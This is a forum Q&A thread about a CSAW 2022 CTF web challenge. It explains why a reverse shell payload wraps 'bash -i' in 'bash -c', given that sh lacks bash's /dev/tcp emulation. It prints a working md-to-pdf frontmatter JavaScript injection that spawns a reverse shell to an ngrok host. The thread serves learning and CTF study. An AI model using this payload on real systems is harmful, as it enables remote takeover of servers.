# Why do you need to wrap bash command inside another when opening a reverse shell?

Tags: exploit, web, pdf, reverse-shell

In the [CSAW 2022](https://ctf.csaw.io/) web challenge, called "my little website", a youtuber in [this](https://www.youtube.com/watch?v=QVaf4DMYPFc&list=WL&index=2&t=804s) video used a vulnerability in md-to-pdf to run arbitrary js, and this is the payload used:

```
---js
((require["child_process"]).execSync("bash -c 'bash -i >& /dev/tcp/2.tcp.ngrok.io/13091 0>&1'"))
---RCE
```

as a comment on the video states, explaining the payload:

> Frontmatter, which is what the triple dashes are, is a feature of some markdown processors to include data like title, date of publication, author name etc. at the start of a document. It's usually YAML data. However, gray-matter, a frontmatter parsing library, lets you use alternative formats such as JSON, TOML, and yes, JavaScript by specifying the language after the triple dashes (---js). This is very useful for some things, but should not be used with untrusted markdown.

From what I understand the `child_process.execSync` simply "Spawns a shell then executes the command within that shell".

My question is why do we need to wrap the inner `bash` command in a `bash -c`? (the exploit didn't work without it)

Comment: he gives a reason about 15:15 sec *"normally you want bash to invoke this ... because it needs to be within bash to do that"* (aka. open fd to a tcp socket)

Comment: @brynk That's precisely the point I don't understand XD. When you use `child_process.execSync` it executes the given command, so why can't you simply use the bash command?

Comment: well if you're dropped into `sh` by `execSync` and then you run `bash -i` it will work fine, but as soon as you want the redirect, you need to have the tcp socket established already - prob here is that `/dev/tcp/` won't work in a standard `sh` afaik

Comment: @brynk So if we had the socket established ommiting the `bash -c` would've worked? How does using `bash -c` solve that problem? And here we're using `bash` and not `sh`

Comment: good question if you already had the socket .. i don't think so because i don't believe `sh` knows what to do with the rhs after `>` (ie. `sh` won't know what to do with `& /dev/tcp/...`)

Comment: @brynk But again, where do we use `sh` here, and how does using `bash -c` solve the problem? Are you trying to say the server uses `sh` and it doesn't recognize the syntax of `& /dev/tcp/...`?

Comment: yep correct - i'd say `execSync` is using `sh` and not `bash` because it's the lowest common denominator (it specifically says "shell" in the nodejs doco, but i haven't looked in the code to confirm)

Comment: So just to be clear - is `sh` unable open tcp connections or is it unable to simply understand the sytnax? (and thanks for your comments, if they were answers I would've marked them as correct)

Comment: @brynk + Then why does the website he uses to generate the code suggest using sh?

Comment: i think both, but i'd have to go back over `man bash` .. good point on the website he's using showing the use of `sh` .. maybe it does support it? but from memory i thought it didn't ... no worries for help, any excuse to avoid what i should be doing! if i get time i might circle back and do a proper answer

Answer (score 1, accepted):

The outer bash is used to connect a command to `2.tcp.ngrok.io` port 13091 (`/dev/tcp` is bash specific). The inner `bash -i` is just the command being run (i.e. creating a reverse shell), you could e.g. replace `bash -i` with `hangman` for a different experience.

Comment: I still don't understand what is the problem with using `bash -i >& /dev/tcp/2.tcp.ngrok.io/13091 0>&1`. If this is bash specific and I'm using `bash -i ...` it should work, no?

Comment: The ">& /dev/tcp/2.tcp.ngrok.io" part is interpreted by the shell that calls the inner bash. So, with a (non-bash) /bin/sh running `bash -i >& /dev/tcp/2.tcp.ngrok.io/13091 0>&1`, sh would open `/dev/tcp/2.tcp.ngrok.io/13091`, and pass that file descriptor down to the execve of `bash -i`. However, since there is no real `/dev/tcp/2.tcp.ngrok.io/13091` (`/dev/tcp` is emulated by bash), that would fail with an error like "Cannot create /dev/tcp/2.tcp.ngrok.io/13091: Directory nonexistant", and it thus doesn't work for a reverse shell.